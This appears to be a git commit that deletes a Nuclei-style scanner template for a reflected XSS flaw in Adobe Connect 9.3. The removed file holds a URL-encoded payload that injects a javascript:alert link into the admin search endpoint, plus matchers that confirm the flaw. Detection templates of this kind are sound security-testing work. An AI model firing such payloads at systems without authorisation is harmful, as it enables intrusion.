Delete adobe-connect-xss.yaml

patch-1
sandeep 2021-06-15 15:54:19 +05:30
parent 891e8374b1
commit b1e401ff9c
1 changed files with 0 additions and 24 deletions

View File

@ -1,24 +0,0 @@
id: adobe-connect-xss
info:
name: Adobe Connect Reflected XSS
author: dhiyaneshDk
reference: https://packetstormsecurity.com/files/132269/Adobe-Connect-9.3-Cross-Site-Scripting.html
severity: medium
tags: adobe,xss
requests:
- method: GET
path:
- "{{BaseURL}}/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=%3Ca%20href%3D%22javascript%3Aalert(%27XSS%27)%22%3EXSS%20Link%3C%2Fa%3E"
matchers-condition: and
matchers:
- type: word
words:
- "javascript:alert('XSS')"
part: body
- type: status
status:
- 200